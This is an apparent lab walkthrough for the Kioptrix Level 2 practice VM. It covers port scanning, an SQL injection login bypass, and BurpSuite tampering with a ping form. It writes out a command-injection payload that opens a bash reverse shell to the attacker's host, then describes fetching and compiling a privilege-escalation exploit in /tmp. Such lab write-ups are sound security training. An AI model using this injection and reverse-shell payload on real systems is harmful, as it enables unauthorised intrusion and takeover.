Kioptrix updated – level2
First, we need to know in which network we are by finding our host IP address.
So, we are in the network of 192.168.1.0 with subnet mask 255.255.255.0 and our Kali IP is 192.168.1.34
Finding remote hosts and detect target vulnerable host:
Using nmap to scan for open ports and operating services
Open ports are: 22, 80, 111, 443, 631(IPP protocol for connecting network printers), 844, 3306
We can guess by looking at mysql port 3306 that there might be a web page available since port 80 is open.
Let’s check for Golden basic SQL Injection vulnerability:
DONE!!!. We exploited sql injection vulnerability. But when the new web page appearing (like below) there is no button for submitting data (POST/GET)!!! It is a bit strange. Let’s find out how to work around this? 🙂
I used BurpSuite community edition to capture and change request/responses parameters to the web server
Make sure the intercept is ON and click on the open browser. Then enter the address of web server in this case: http://192.168.1.102
Now, Redo the sql injection again this time using BurpSuite and looking at what parameters are passing between client and server.
Now, if we inspect, we can see that some html error causes the SUBMIT button to disappear. But we can detect the parameters needed to pass to the web server, and the FORM action php page is in charge. They are “ip” parameter and “submit” button and pingit.php page.
In the above, we should right click on packet received from 192.168.1.102 and choose send to Repeater in order to let us EDIT the request.
Below, change the action php page and adjust our parameters. And click on the SEND orange button and look at the RESPONSE window. We got the result. BOOM!
Now for simplicity, not sending every single packet through the BrupSuite, we need to tell the server to establish a reverse shell to our system (attacker). Using the nc command we open a port 444 and listen to it and wait for the server to connect.
Enter following command:
127.0.0.1;bash -i >& /dev/tcp/192.168.1.34/444 0>&1
Notice: for every single WHITE SPACE we put %20 and for & sign we put %26 (codes for those characters since space and special characters must be sent by their corresponding code)
We get a shell. But by issuing an id command, we can see that our user(apache) does not have enough privileges. It is not ROOT yet.
We know server is running CentOS 4.5
A quick search on exploit-db gives us the exploit to escalate the privilege.
We cannot issue wget on the victim machine (not connected to the internet). We download the exploit on the Kali system and start the apache2 web server on the Kali. then download the exploit from Kali to the victim
After exploit downloaded on Kali, we need to change directory on the victim in order to have write and compile privileges (to compile and run the exploit) so move to /tmp and download from Kali and compile and run it.